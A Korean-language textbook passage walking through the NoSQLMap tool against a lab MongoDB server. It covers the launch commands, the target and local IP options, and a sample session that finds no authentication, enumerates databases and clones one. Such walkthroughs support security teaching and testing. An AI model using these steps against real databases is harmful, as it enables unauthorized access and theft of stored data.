3.7.1 NoSQLMap 시작
cd /opt/NoSQLMap
python nosqlmap.py
• 1-Set options 선택
- 대상 호스트 IP(여러분의 MongoDB IP) 옵션 설정
- 로컬 MongoDB/Shell IP 설정(여러분의 IP)
- b : 옵션 파일 저장
- x : 나가기
• 2-NoSQL DB Access Attacks 선택
공격을 시작했다면 다음과 같은 내용이 나올 것이다.
DB Access attacks (MongoDB)
=================
Checking to see if credentials are needed...
Successful access with no credentials!
MongoDB web management open at http://192.168.199.128:28017. No authentication required!
Start tests for REST Interface (y/n)? y
REST interface not enabled.
1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
Select an attack: 1
Server Info:
MongoDB Version: 2.0.6
Debugs enabled: False
Platform: 32 bit
Select an attack: 2
List of databases:
local
admin
users
appUserData
Select an attack: 4
Select a database to steal: 5
Does this database require credentials (y/n)? n
Database cloned. Copy another (y/n)? n